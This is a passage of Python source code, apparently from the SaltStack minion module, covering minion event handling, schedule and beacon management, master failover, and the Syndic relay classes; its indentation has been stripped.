ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = %s', ret_val) # pylint: disable=no-member
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
if self.opts.get('master_type', 'str') == 'disable' and \
self.opts.get('file_client', 'remote') == 'remote':
log.warning(
'Cannot run startup_states when \'master_type\' is set '
'to \'disable\' and \'file_client\' is set to '
'\'remote\'. Skipping.'
)
else:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
if self.opts['enable_legacy_startup_events']:
# old style event. Defaults to False in Neon Salt release
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# send name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify=%s', notify)
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
def beacons_refresh(self):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing beacons.')
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
if self.connected:
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, tag, data):
'''
Refresh the functions and returners.
'''
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
if func == 'delete':
self.schedule.delete_job(name, persist)
elif func == 'add':
self.schedule.add_job(schedule, persist)
elif func == 'modify':
self.schedule.modify_job(name, schedule, persist)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, persist)
elif func == 'run_job':
self.schedule.run_job(name)
elif func == 'disable_job':
self.schedule.disable_job(name, persist)
elif func == 'postpone_job':
self.schedule.postpone_job(name, data)
elif func == 'skip_job':
self.schedule.skip_job(name, data)
elif func == 'reload':
self.schedule.reload(schedule)
elif func == 'list':
self.schedule.list(where)
elif func == 'save_schedule':
self.schedule.save_schedule()
elif func == 'get_next_fire_time':
self.schedule.get_next_fire_time(name)
def manage_beacons(self, tag, data):
'''
Manage Beacons
'''
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
include_pillar = data.get('include_pillar', None)
include_opts = data.get('include_opts', None)
if func == 'add':
self.beacons.add_beacon(name, beacon_data)
elif func == 'modify':
self.beacons.modify_beacon(name, beacon_data)
elif func == 'delete':
self.beacons.delete_beacon(name)
elif func == 'enable':
self.beacons.enable_beacons()
elif func == 'disable':
self.beacons.disable_beacons()
elif func == 'enable_beacon':
self.beacons.enable_beacon(name)
elif func == 'disable_beacon':
self.beacons.disable_beacon(name)
elif func == 'list':
self.beacons.list_beacons(include_opts, include_pillar)
elif func == 'list_available':
self.beacons.list_available_beacons()
elif func == 'validate_beacon':
self.beacons.validate_beacon(name, beacon_data)
def environ_setenv(self, tag, data):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This %s was scheduled to stop. Not running %s.tune_in()',
self.__class__.__name__, self.__class__.__name__
)
return
elif self._running is True:
log.error(
'This %s is already running. Not running %s.tune_in()',
self.__class__.__name__, self.__class__.__name__
)
return
try:
log.info(
'%s is starting as user \'%s\'',
self.__class__.__name__, salt.utils.user.get_user()
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.platform.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting %s',
self.__class__.__name__,
exc_info=err
)
def _mine_send(self, tag, data):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
data['tok'] = self.tok
try:
ret = channel.send(data)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
if not self.ready:
raise tornado.gen.Return()
tag, data = salt.utils.event.SaltEvent.unpack(package)
log.debug(
'Minion of \'%s\' is handling event tag \'%s\'',
self.opts['master'], tag
)
if tag.startswith('module_refresh'):
self.module_refresh(
force_refresh=data.get('force_refresh', False),
notify=data.get('notify', False)
)
elif tag.startswith('pillar_refresh'):
yield self.pillar_refresh(
force_refresh=data.get('force_refresh', False)
)
elif tag.startswith('beacons_refresh'):
self.beacons_refresh()
elif tag.startswith('manage_schedule'):
self.manage_schedule(tag, data)
elif tag.startswith('manage_beacons'):
self.manage_beacons(tag, data)
elif tag.startswith('grains_refresh'):
if (data.get('force_refresh', False) or
self.grains_cache != self.opts['grains']):
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif tag.startswith('environ_setenv'):
self.environ_setenv(tag, data)
elif tag.startswith('_minion_mine'):
self._mine_send(tag, data)
elif tag.startswith('fire_master'):
if self.connected:
log.debug('Forwarding master event tag=%s', data['tag'])
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif tag.startswith(master_event(type='disconnected')) or tag.startswith(master_event(type='failback')):
# if the master disconnect event is for a different master, raise an exception
if tag.startswith(master_event(type='disconnected')) and data['master'] != self.opts['master']:
# not mine master, ignore
return
if tag.startswith(master_event(type='failback')):
# if the master failback event is not for the top master, raise an exception
if data['master'] != self.opts['master_list'][0]:
raise SaltException('Bad master \'{0}\' when mine failback is \'{1}\''.format(
data['master'], self.opts['master']))
# if the master failback event is for the current master, raise an exception
elif data['master'] == self.opts['master'][0]:
raise SaltException('Already connected to \'{0}\''.format(data['master']))
if self.connected:
# we are not connected anymore
self.connected = False
log.info('Connection to master %s lost', self.opts['master'])
if self.opts['master_type'] != 'failover':
# modify the scheduled job to fire on reconnect
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
else:
# delete the scheduled job to don't interfere with the failover process
if self.opts['transport'] != 'tcp':
self.schedule.delete_job(name=master_event(type='alive'))
log.info('Trying to tune in to next master from master-list')
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'auth'):
self.pub_channel.auth.invalidate()
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
try:
master, self.pub_channel = yield self.eval_master(
opts=self.opts,
failed=True,
failback=tag.startswith(master_event(type='failback')))
except SaltClientError:
pass
if self.connected:
self.opts['master'] = master
# re-init the subsystems to work with the new master
log.info(
'Re-initialising subsystems for new master %s',
self.opts['master']
)
# put the current schedule into the new loaders
self.opts['schedule'] = self.schedule.option('schedule')
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# make the schedule to use the new 'functions' loader
self.schedule.functions = self.functions
self.pub_channel.on_recv(self._handle_payload)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
if self.opts['master_failback'] and 'master_list' in self.opts:
if self.opts['master'] != self.opts['master_list'][0]:
schedule = {
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
self.schedule.modify_job(name=master_event(type='failback'),
schedule=schedule)
else:
self.schedule.delete_job(name=master_event(type='failback'), persist=True)
else:
self.restart = True
self.io_loop.stop()
elif tag.startswith(master_event(type='connected')):
# handle this event only once. otherwise it will pollute the log
# also if master type is failover all the reconnection work is done
# by `disconnected` event handler and this event must never happen,
# anyway check it to be sure
if not self.connected and self.opts['master_type'] != 'failover':
log.info('Connection to master %s re-established', self.opts['master'])
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
elif tag.startswith('__schedule_return'):
# reporting current connection with master
if data['schedule'].startswith(master_event(type='alive', master='')):
if data['return']:
log.debug(
'Connected to master %s',
data['schedule'].split(master_event(type='alive', master=''))[1]
)
self._return_pub(data, ret_cmd='_return', sync=False)
elif tag.startswith('_salt_error'):
if self.connected:
log.debug('Forwarding salt error event tag=%s', tag)
self._fire_master(data, tag)
elif tag.startswith('salt/auth/creds'):
key = tuple(data['key'])
log.debug(
'Updating auth data for %s: %s -> %s',
key, salt.crypt.AsyncAuth.creds_map.get(key), data['creds']
)
salt.crypt.AsyncAuth.creds_map[tuple(data['key'])] = data['creds']
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.platform.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
def _setup_core(self):
'''
Set up the core minion attributes.
This is safe to call multiple times.
'''
if not self.ready:
# First call. Initialize.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.user.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.grains_cache = self.opts['grains']
self.ready = True
def setup_beacons(self, before_connect=False):
'''
Set up the beacons.
This is safe to call multiple times.
'''
self._setup_core()
loop_interval = self.opts['loop_interval']
new_periodic_callbacks = {}
if 'beacons' not in self.periodic_callbacks:
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
def handle_beacons():
# Process Beacons
beacons = None
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons and self.connected:
self._fire_master(events=beacons)
new_periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(handle_beacons, loop_interval * 1000, io_loop=self.io_loop)
if before_connect:
# Make sure there is a chance for one iteration to occur before connect
handle_beacons()
if 'cleanup' not in self.periodic_callbacks:
new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(self._fallback_cleanups, loop_interval * 1000, io_loop=self.io_loop)
# start all the other callbacks
for periodic_cb in six.itervalues(new_periodic_callbacks):
periodic_cb.start()
self.periodic_callbacks.update(new_periodic_callbacks)
def setup_scheduler(self, before_connect=False):
'''
Set up the scheduler.
This is safe to call multiple times.
'''
self._setup_core()
loop_interval = self.opts['loop_interval']
new_periodic_callbacks = {}
if 'schedule' not in self.periodic_callbacks:
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[master_event(type='alive')])
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
new_periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000, io_loop=self.io_loop)
if before_connect:
# Make sure there is a chance for one iteration to occur before connect
handle_schedule()
if 'cleanup' not in self.periodic_callbacks:
new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(self._fallback_cleanups, loop_interval * 1000, io_loop=self.io_loop)
# start all the other callbacks
for periodic_cb in six.itervalues(new_periodic_callbacks):
periodic_cb.start()
self.periodic_callbacks.update(new_periodic_callbacks)
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
log.debug('Minion \'%s\' trying to tune in', self.opts['id'])
if start:
if self.opts.get('beacons_before_connect', False):
self.setup_beacons(before_connect=True)
if self.opts.get('scheduler_before_connect', False):
self.setup_scheduler(before_connect=True)
self.sync_connect_master()
if self.connected:
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
if HAS_WIN_FUNCTIONS:
salt.utils.win_functions.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
self.setup_beacons()
self.setup_scheduler()
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0 and self.connected:
def ping_master():
try:
def ping_timeout_handler(*_):
if self.opts.get('auth_safemode', False):
log.error('** Master Ping failed. Attempting to restart minion**')
delay = self.opts.get('random_reauth_delay', 5)
log.info('delaying random_reauth_delay %ss', delay)
# regular sys.exit raises an exception -- which isn't sufficient in a thread
os._exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
self._fire_master('ping', 'minion_ping', sync=False, timeout_handler=ping_timeout_handler)
except Exception:
log.warning('Attempt to ping master failed.', exc_on_loglevel=logging.DEBUG)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000, io_loop=self.io_loop)
self.periodic_callbacks['ping'].start()
# add handler to subscriber
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(self._handle_payload)
elif self.opts.get('master_type') != 'disable':
log.error('No connection to master found. Scheduled jobs will not run.')
if start:
try:
self.io_loop.start()
if self.restart:
self.destroy()
except (KeyboardInterrupt, RuntimeError): # A RuntimeError can be re-raised by Tornado on shutdown
self.destroy()
def _handle_payload(self, payload):
if payload is not None and payload['enc'] == 'aes':
if self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
elif self.opts['zmq_filtering']:
# In the filtering enabled case, we'd like to know when minion sees something it shouldnt
log.trace(
'Broadcast message received not for this minion, Load: %s',
payload['load']
)
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the minion currently has no need.
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = getattr(self.matcher,
'{0}_match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matcher.glob_match(load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'schedule'):
del self.schedule
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because Syndic don't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
self.jids = {}
self.raw_events = []
self.pub_future = None
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
def timeout_handler(*args):
log.warning('Unable to forward pub data: %s', args[1])
return True
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self.local.pub_async(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
io_loop=self.io_loop,
callback=lambda _: None,
**kwargs)
def fire_master_syndic_start(self):
# Send an event to the master that the minion is live
if self.opts['enable_legacy_startup_events']:
# old style event. Defaults to false in Neon Salt release.
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start',
sync=False,
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
sync=False,
)
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None and payload['enc'] == 'aes':
log.trace('Handling payload')
self._handle_decoded_payload(payload['load'])
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the syndic currently has no need.
@tornado.gen.coroutine
def reconnect(self):
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
master, self.pub_channel = yield self.eval_master(opts=self.opts)
if self.connected:
self.opts['master'] = master
self.pub_channel.on_recv(self._process_cmd_socket)
log.info('Minion is ready to receive requests!')
raise tornado.gen.Return(self)
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: need a way of knowing if the syndic connection is busted
class SyndicManager(MinionBase):
'''
Make a MultiMaster syndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`:
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way) this daemon does not handle failure well,
it will (under most circumstances) stall the daemon for ~15s trying to forward events
to the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(SyndicManager, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self.syndic_failover = self.opts.get('syndic_failover', 'random')
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
else:
self.io_loop = io_loop
# List of events
self.raw_events = []
# Dict of rets: {master_id: {event_tag: job_ret, ...}, ...}
self.job_rets = {}
# List of delayed job_rets which was unable to send for some reason and will be resend to
# any available master
self.delayed = []
# Active pub futures: {master_id: (future, [job_ret, ...]), ...}
self.pub_futures = {}
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = OrderedDict() # mapping of opts['master'] -> syndic
masters = self.opts['master']
if not isinstance(masters, list):
masters = [masters]
for master in masters:
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
failed = False
while True:
log.debug(
'Syndic attempting to connect to %s',
opts['master']
)
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master(failed=failed)
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
# Send an event to the master that the minion is live
syndic.fire_master_syndic_start()
log.info(
'Syndic successfully connected to %s',
opts['master']
)
break
except SaltClientError as exc:
failed = True
log.error(
'Error while bringing up syndic for multi-syndic. Is the '
'master at %s responding?', opts['master']
)
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except KeyboardInterrupt:
raise
except: # pylint: disable=W0702
failed = True
log.critical(
'Unexpected error while connecting to %s',
opts['master'], exc_info=True
)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if its connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics[master].result() # pylint: disable=no-member
self._syndics[master] = syndic.reconnect()
else:
# TODO: debug?
log.info(
'Attempting to mark %s as dead, although it is already '
'marked dead', master
)
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
successful = False
# Call for each master
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error(
'Unable to call %s on %s, that syndic is not connected',
func, master
)
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
successful = True
except SaltClientError:
log.error(
'Unable to call %s on %s, trying another...',
func, master
)
self._mark_master_dead(master)
if not successful:
log.critical('Unable to call %s on any masters!', func)
def _return_pub_syndic(self, values, master_id=None):
'''
Wrapper to call the '_return_pub_multi' a syndic, best effort to get the one you asked for
'''
func = '_return_pub_multi'
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error(
'Unable to call %s on %s, that syndic is not connected',
func, master
)
continue
future, data = self.pub_futures.get(master, (None, None))
if future is not None:
if not future.done():
if master == master_id:
# Targeted master previous send not done yet, call again later
return False
else:
# Fallback master is busy, try the next one
continue
elif future.exception():
# Previous execution on this master returned an error
log.error(
'Unable to call %s on %s, trying another...',
func, master
)
self._mark_master_dead(master)
del self.pub_futures[master]
# Add not sent data to the delayed list and try the next master
self.delayed.extend(data)
continue
future = getattr(syndic_future.result(), func)(values,
'_syndic_return',
timeout=self._return_retry_timer(),
sync=False)
self.pub_futures[master] = (future, values)
return True
# Loop done and didn't exit: wasn't sent, try again later
return False
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self._syndics.keys())
if self.opts['syndic_failover'] == 'random':
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.job_rets = {}
self.raw_events = []
def reconnect_event_bus(self, something):
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
self.local.event.subscribe('')
log.debug('SyndicManager \'%s\' trying to tune in', self.opts['id'])
# register the event sub to the poller
self.job_rets = {}
self.raw_events = []
self._reset_event_aggregation()
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
log.trace('Got event %s', mtag) # pylint: disable=no-member
tag_parts = mtag.split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in data:
if 'jid' not in data:
# Not a job return
return
if self.syndic_mode == 'cluster' and data.get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return received with matching master_id, not forwarding')
return
master = data.get('master_id')
jdict = self.job_rets.setdefault(master, {}).setdefault(mtag, {})
if not jdict:
jdict['__fun__'] = data.get('fun')
jdict['__jid__'] = data['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if data['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](data['jid'])
)
self.jid_forward_cache.add(data['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if master is not None:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = master
ret = {}
for key in 'return', 'retcode', 'success':
if key in data:
ret[key] = data[key]
jdict[data['id']] = ret
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top level masters-- don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in data:
self.raw_events.append({'data': data, 'tag': mtag})
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
events = self.raw_events
self.raw_events = []
self._call_syndic('_fire_master',
kwargs={'events': events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self._return_retry_timer(),
'sync': False,
},
)
if self.delayed:
res = self._return_pub_syndic(self.delayed)
if res:
self.delayed = []
for master in list(six.iterkeys(self.job_rets)):
values = list(six.itervalues(self.job_rets[master]))
res = self._return_pub_syndic(values, master_id=master)
if res:
del self.job_rets[master]
class Matcher(object):
'''
Use to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: %s', matcher)
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, six.string_types):
return False
